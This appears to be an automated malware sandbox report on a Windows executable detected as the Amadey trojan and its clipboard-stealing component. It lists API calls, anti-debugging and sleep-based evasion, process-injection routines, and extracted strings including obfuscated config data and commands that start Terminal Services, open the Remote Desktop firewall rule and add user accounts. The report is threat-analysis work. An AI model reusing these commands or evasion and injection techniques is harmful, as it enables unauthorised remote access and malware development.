Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CB5450	0_2_00CB5450
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CDB610	0_2_00CDB610
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CDF82B	0_2_00CDF82B
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CF1A27	0_2_00CF1A27
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CF5E24	0_2_00CF5E24
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CF5F44	0_2_00CF5F44

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: String function: 00CD3190 appears 59 times
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: String function: 00CD9E71 appears 60 times
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: String function: 00CDA6C0 appears 56 times
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: String function: 00CD40A0 appears 136 times
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: String function: 00CB61F0 appears 34 times

Source: 6uHfmjGMfL.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CBE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,

0_2_00CBE8D0

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Mutant created: \Sessions\1\BaseNamedObjects\c33e9ad058e5d380869687d885c0668c

Source: 6uHfmjGMfL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 6uHfmjGMfL.exe	Virustotal: Detection: 55%
Source: 6uHfmjGMfL.exe	ReversingLabs: Detection: 63%

Source: 6uHfmjGMfL.exe	String found in binary or memory: " /add /y
Source: 6uHfmjGMfL.exe	String found in binary or memory: " /add
Source: 6uHfmjGMfL.exe	String found in binary or memory: " /add /y
Source: 6uHfmjGMfL.exe	String found in binary or memory: " /add
Source: 6uHfmjGMfL.exe	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setef593705fac41080913cacb53465d610c33e9ad058e5d380869687d885c0668cc5a4ec860f68b736482525c28f5090edd334fc27rnRSUUh2Xr4bi9XNEwc4ep4V9m2Rvle2Gs4Yyt4XLVPMF=P7zu3OYjgmTe5r2l9xs=RXYvEc==YDUj4DJnNXVq6M==PXPq6M==2YevEP3dSDjaP6==V8bY6TKnQmXXPF==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQoWXV93V==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaNTCfhiDM1vSh stIb4yeRQEtY8Lf5jGVhA==YrPr27ViAyYxNFLGHtiHGs1BL5FaY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQogsPsRCmmRzK YMDtRZybgXO=Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaMY7fgGy Hb6hXwNAcy==N0PRJRyKZkazIJuuHG==1Jzu5w==YJ3RNw==V5PSe1K4hsG4g7K4f8G42re422C4gLG4h1Y43LU422S4fMS4f774goU=28DjRyUegGz1ORueasXmbIy228DjRyUegGy=27rn5yUegGy=3Iy=3Yy=3YC=3YG=X1zn4c==eMLY5zdpQw==eMLY5DB0Qy =32bj3Lrq27VigMGvf2HnirfuP8zZ3SKUTLG+TLK+P6vq6S3jgnOoODmpMB==jF==NsPs3TF3TV==g7bj4CltRi7d2vt=e7Pw4iKmRzKnPvuhV7PYLiuUfX1eKSiobwNvSY6g4p==YMDtRZybgUTa4vC2U0TzMXFaZ2af4wa7acM=U2Tn5it=W7zx5CKsh2vYytu7W7==V0HDNw==YLzsRCtaZ2Xc4MGebxc=VL3h6CYsNFfeO6==U0TFQESuNCYU3WzMPLKQacd2eS==UrfYRCKg4W7dPMF=Xr3w6CYoY73u3CYtU73r4YGpZ7fsJCKg4W7dPMF=QIywEvFVSjeXEF==grC=h7C=U73s6CKoiC3N5MyaM9tvdYyU3QwbfiGk3r3w4OQe3XTaEny8 TNwZIGs7MVnONQiPXUrDOPnHVjB4YUU4W7TBJOeaTtxc4mU3P4oRdrbf8DrDSGbiGG0yv27 MMaIoSb6zzcRtrbe1rj4iun4T2bMlUIIYYoiGXn4rYJcNtnOkCb5AwmdRD7hLft4eYp33Te4rYobxBnYY1Hu VEHVirDOPnQS2=PXULuc==T8Hh5fPrPrjuRs==U73s6CKoiC3N5MyaM9tjcJCm3PIbgBbkfn32DT3Xiy3f2SGiJNNAbIWoQV4e2RG=Y6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6GR6iaxN2ZZKIQPWf0zDkf2vZ6CKsYmHmPF==U73r5DKU4XLHOLYa21DhRCKg42ji1bqh MXxcJGs5WMVgi4Ti2iuEPxtSDWVDodUJL0=P2Ps3SCp4GWmY6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6LL2ebwNmVomeRP47TVZDZKDNLBmQXUTyJQt=Y6fRNAKH2EPo2cOn SpVZZRqEwA7XXLnhrfhRTC7VmHs1LKt9NFybIGZPyUj2BLkZrfiRSYDWA==1IuuEzp=VLPkQTKmiFPe4wOe c6BLniMRQIpeCLPe13sVLPkQTKmiFPe4wOe c6BLnmMRQIpeCLPe13sY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8GeLhG7V3Xr3bSjbvRncpOj4VZ=YMDtRDKdiE7a2LR=QouvGM==QouwEc==QouvFc==QouwFM==U8Pw5iKoiELU1Lu 1F==Soi4gsPsRCmmRzKnPMeaP7meMsLf5YilfWzlyr6bGs1rbUBcMnukBeqUfW3e2SSPGtwiJkZaRzQmLv==NnSeJT7jiCK=MnukBeqs4W6 MHSkAw==YL31RTytfGXl2r2acwM=P1P2RSCViGno2cyk wdleUCsRPWpgBLoe18sRSFaQU1i2vR6G7==Ml==g7bZ6CGpi26 BMJ6JNIiMC==g8K75s==grzsRCYnW7P3QiYbhmS JvCU TN2XHCsRPsp1RG=QIuuEzpURTm=QIuuEzpURjK=QIuuEzpURjO=QIuuEzpUR20=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: 6uHfmjGMfL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 6uHfmjGMfL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 6uHfmjGMfL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 6uHfmjGMfL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 6uHfmjGMfL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 6uHfmjGMfL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 6uHfmjGMfL.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 6uHfmjGMfL.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 6uHfmjGMfL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 6uHfmjGMfL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 6uHfmjGMfL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 6uHfmjGMfL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 6uHfmjGMfL.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: 6uHfmjGMfL.exe

Static PE information: section name: sqaf

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CDA111 push ecx; ret		0_2_00CDA124
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CDC547 push ebx; ret		0_2_00CDC586

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CD923D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00CD923D

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Window / User API: threadDelayed 6094			Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Window / User API: threadDelayed 3735			Jump to behavior

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe TID: 3636	Thread sleep count: 6094 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe TID: 3636	Thread sleep time: -182820000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe TID: 3552	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe TID: 3636	Thread sleep count: 3735 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe TID: 3636	Thread sleep time: -112050000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CEF0C1 FindFirstFileExW,

0_2_00CEF0C1

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CB93D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW,

0_2_00CB93D0

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, 6uHfmjGMfL.exe, 00000000.00000002.4482159643.000000000138E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CDA2F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00CDA2F5

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CE6142 mov eax, dword ptr fs:[00000030h]		0_2_00CE6142
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CDDCB0 mov eax, dword ptr fs:[00000030h]		0_2_00CDDCB0

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CF0642 GetProcessHeap,

0_2_00CF0642

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CDA2F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CDA2F5
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CDA458 SetUnhandledExceptionFilter,	0_2_00CDA458
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CDECBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CDECBD
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CD9A08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00CD9A08

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CB8070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

0_2_00CB8070

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CDA4DF cpuid

0_2_00CDA4DF

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: GetLocaleInfoW,	0_2_00CF2171
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: EnumSystemLocalesW,	0_2_00CF22FE
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: EnumSystemLocalesW,	0_2_00CF2263
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: EnumSystemLocalesW,	0_2_00CF2218
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00CF2389
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: EnumSystemLocalesW,	0_2_00CE830C
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: GetLocaleInfoW,	0_2_00CF25DC
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00CF2702
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00CF28D7
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: GetLocaleInfoW,	0_2_00CF2808
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: GetLocaleInfoW,	0_2_00CE882E
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_00CF1F76

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Queries volume information: C:\Users\user\Desktop\6uHfmjGMfL.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CDA705 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00CDA705

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

0_2_00CB61F0

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CEE7DE _free,_free,_free,GetTimeZoneInformation,_free,

0_2_00CEE7DE

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CB91B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,

0_2_00CB91B0

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 6uHfmjGMfL.exe, type: SAMPLE
Source: Yara match	File source: 0.0.6uHfmjGMfL.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6uHfmjGMfL.exe.cb0000.0.unpack, type: UNPACKEDPE

Remote Access Functionality

Contains functionality to start a terminal service

Source: 6uHfmjGMfL.exe	String found in binary or memory: net start termservice
Source: 6uHfmjGMfL.exe, 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: 6uHfmjGMfL.exe, 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setef593705fac41080913cacb53465d610c33e9ad058e5d380869687d885c0668cc5a4ec860f68b736482525c28f5090edd334fc27rnRSUUh2Xr4bi9XNEwc4ep4V9m2Rvle2Gs4Yyt4XLVPMF=P7zu3OYjgmTe5r2l9xs=RXYvEc==YDUj4DJnNXVq6M==PXPq6M==2YevEP3dSDjaP6==V8bY6TKnQmXXPF==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQoWXV93V==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaNTCfhiDM1vSh stIb4yeRQEtY8Lf5jGVhA==YrPr27ViAyYxNFLGHtiHGs1BL5FaY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQogsPsRCmmRzK YMDtRZybgXO=Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaMY7fgGy Hb6hXwNAcy==N0PRJRyKZkazIJuuHG==1Jzu5w==YJ3RNw==V5PSe1K4hsG4g7K4f8G42re422C4gLG4h1Y43LU422S4fMS4f774goU=28DjRyUegGz1ORueasXmbIy228DjRyUegGy=27rn5yUegGy=3Iy=3Yy=3YC=3YG=X1zn4c==eMLY5zdpQw==eMLY5DB0Qy =32bj3Lrq27VigMGvf2HnirfuP8zZ3SKUTLG+TLK+P6vq6S3jgnOoODmpMB==jF==NsPs3TF3TV==g7bj4CltRi7d2vt=e7Pw4iKmRzKnPvuhV7PYLiuUfX1eKSiobwNvSY6g4p==YMDtRZybgUTa4vC2U0TzMXFaZ2af4wa7acM=U2Tn5it=W7zx5CKsh2vYytu7W7==V0HDNw==YLzsRCtaZ2Xc4MGebxc=VL3h6CYsNFfeO6==U0TFQESuNCYU3WzMPLKQacd2eS==UrfYRCKg4W7dPMF=Xr3w6CYoY73u3CYtU73r4YGpZ7fsJCKg4W7dPMF=QIywEvFVSjeXEF==grC=h7C=U73s6CKoiC3N5MyaM9tvdYyU3QwbfiGk3r3w4OQe3XTaEny8 TNwZIGs7MVnONQiPXUrDOPnHVjB4YUU4W7TBJOeaTtxc4mU3P4oRdrbf8DrDSGbiGG0yv27 MMaIoSb6zzcRtrbe1rj4iun4T2bMlUIIYYoiGXn4rYJcNtnOkCb5AwmdRD7hLft4eYp33Te4rYobxBnYY1Hu VEHVirDOPnQS2=PXULuc==T8Hh5fPrPrjuRs==U73s6CKoiC3N5MyaM9tjcJCm3PIbgBbkfn32DT3Xiy3f2SGiJNNAbIWoQV4e2RG=Y6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6GR6iaxN2ZZKIQPWf0zDkf2vZ6CKsYmHmPF==U73r5DKU4XLHOLYa21DhRCKg42ji1bqh MXxcJGs5WMVgi4Ti2iuEPxtSDWVDodUJL0=P2Ps3SCp4GWmY6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6LL2ebwNmVomeRP47TVZDZKDNLBmQXUTyJQt=Y6fRNAKH2EPo2cOn SpVZZRqEwA7XXLnhrfhRTC7VmHs1LKt9NFybIGZPyUj2BLkZrfiRSYDWA==1IuuEzp=VLPkQTKmiFPe4wOe c6BLniMRQIpeCLPe13sVLPkQTKmiFPe4wOe c6BLnmMRQIpeCLPe13sY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8GeLhG7V3Xr3bSjbvRncpOj4VZ=YMDtRDKdiE7a2LR=QouvGM==QouwEc==QouvFc==QouwFM==U8Pw5iKoiELU1Lu 1F==Soi4gsPsRCmmRzKnPMeaP7meMsLf5YilfWzlyr6bGs1rbUBcMnukBeqUfW3e2SSPGtwiJkZaRzQmLv==NnSeJT7jiCK=MnukBeqs4W6 MHSkAw==YL31RTytfGXl2r2acwM=P1P2RSCViGno2cyk wdleUCsRPWpgBLoe18sRSFaQU1i2vR6G7==Ml==g7bZ6CGpi26 BMJ6JNIiMC==g8K75s==grzsRCYnW7P3QiYbhmS JvCU TN2XHCsRPsp1RG=QIuuEzpURTm=QIuuEzpURjK=QIuuEzpURjO=QIuuEzpUR20=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=
Source: 6uHfmjGMfL.exe, 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: 6uHfmjGMfL.exe, 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setef593705fac41080913cacb53465d610c33e9ad058e5d380869687d885c0668cc5a4ec860f68b736482525c28f5090edd334fc27rnRSUUh2Xr4bi9XNEwc4ep4V9m2Rvle2Gs4Yyt4XLVPMF=P7zu3OYjgmTe5r2l9xs=RXYvEc==YDUj4DJnNXVq6M==PXPq6M==2YevEP3dSDjaP6==V8bY6TKnQmXXPF==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQoWXV93V==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaNTCfhiDM1vSh stIb4yeRQEtY8Lf5jGVhA==YrPr27ViAyYxNFLGHtiHGs1BL5FaY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQogsPsRCmmRzK YMDtRZybgXO=Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaMY7fgGy Hb6hXwNAcy==N0PRJRyKZkazIJuuHG==1Jzu5w==YJ3RNw==V5PSe1K4hsG4g7K4f8G42re422C4gLG4h1Y43LU422S4fMS4f774goU=28DjRyUegGz1ORueasXmbIy228DjRyUegGy=27rn5yUegGy=3Iy=3Yy=3YC=3YG=X1zn4c==eMLY5zdpQw==eMLY5DB0Qy =32bj3Lrq27VigMGvf2HnirfuP8zZ3SKUTLG+TLK+P6vq6S3jgnOoODmpMB==jF==NsPs3TF3TV==g7bj4CltRi7d2vt=e7Pw4iKmRzKnPvuhV7PYLiuUfX1eKSiobwNvSY6g4p==YMDtRZybgUTa4vC2U0TzMXFaZ2af4wa7acM=U2Tn5it=W7zx5CKsh2vYytu7W7==V0HDNw==YLzsRCtaZ2Xc4MGebxc=VL3h6CYsNFfeO6==U0TFQESuNCYU3WzMPLKQacd2eS==UrfYRCKg4W7dPMF=Xr3w6CYoY73u3CYtU73r4YGpZ7fsJCKg4W7dPMF=QIywEvFVSjeXEF==grC=h7C=U73s6CKoiC3N5MyaM9tvdYyU3QwbfiGk3r3w4OQe3XTaEny8 TNwZIGs7MVnONQiPXUrDOPnHVjB4YUU4W7TBJOeaTtxc4mU3P4oRdrbf8DrDSGbiGG0yv27 MMaIoSb6zzcRtrbe1rj4iun4T2bMlUIIYYoiGXn4rYJcNtnOkCb5AwmdRD7hLft4eYp33Te4rYobxBnYY1Hu VEHVirDOPnQS2=PXULuc==T8Hh5fPrPrjuRs==U73s6CKoiC3N5MyaM9tjcJCm3PIbgBbkfn32DT3Xiy3f2SGiJNNAbIWoQV4e2RG=Y6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6GR6iaxN2ZZKIQPWf0zDkf2vZ6CKsYmHmPF==U73r5DKU4XLHOLYa21DhRCKg42ji1bqh MXxcJGs5WMVgi4Ti2iuEPxtSDWVDodUJL0=P2Ps3SCp4GWmY6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6LL2ebwNmVomeRP47TVZDZKDNLBmQXUTyJQt=Y6fRNAKH2EPo2cOn SpVZZRqEwA7XXLnhrfhRTC7VmHs1LKt9NFybIGZPyUj2BLkZrfiRSYDWA==1IuuEzp=VLPkQTKmiFPe4wOe c6BLniMRQIpeCLPe13sVLPkQTKmiFPe4wOe c6BLnmMRQIpeCLPe13sY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8GeLhG7V3Xr3bSjbvRncpOj4VZ=YMDtRDKdiE7a2LR=QouvGM==QouwEc==QouvFc==QouwFM==U8Pw5iKoiELU1Lu 1F==Soi4gsPsRCmmRzKnPMeaP7meMsLf5YilfWzlyr6bGs1rbUBcMnukBeqUfW3e2SSPGtwiJkZaRzQmLv==NnSeJT7jiCK=MnukBeqs4W6 MHSkAw==YL31RTytfGXl2r2acwM=P1P2RSCViGno2cyk wdleUCsRPWpgBLoe18sRSFaQU1i2vR6G7==Ml==g7bZ6CGpi26 BMJ6JNIiMC==g8K75s==grzsRCYnW7P3QiYbhmS JvCU TN2XHCsRPsp1RG=QIuuEzpURTm=QIuuEzpURjK=QIuuEzpURjO=QIuuEzpUR20=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=
Source: 6uHfmjGMfL.exe	String found in binary or memory: net start termservice
